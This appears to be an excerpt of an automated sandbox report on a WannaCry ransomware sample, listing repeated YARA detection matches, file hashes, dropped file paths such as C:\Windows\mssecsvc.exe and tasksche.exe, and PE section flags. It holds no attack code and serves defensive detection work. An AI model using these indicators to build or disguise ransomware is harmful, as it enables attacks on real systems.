              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 0000001D.00000000.347152674.000000000040E000.00000008.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000004.00000000.265483719.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000004.00000000.267432086.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              PE file has a writeable .text section
              Source: mssecsvc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FjYNZSPNkt.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
              Source: FjYNZSPNkt.dll, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: FjYNZSPNkt.dll, type: SAMPLEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
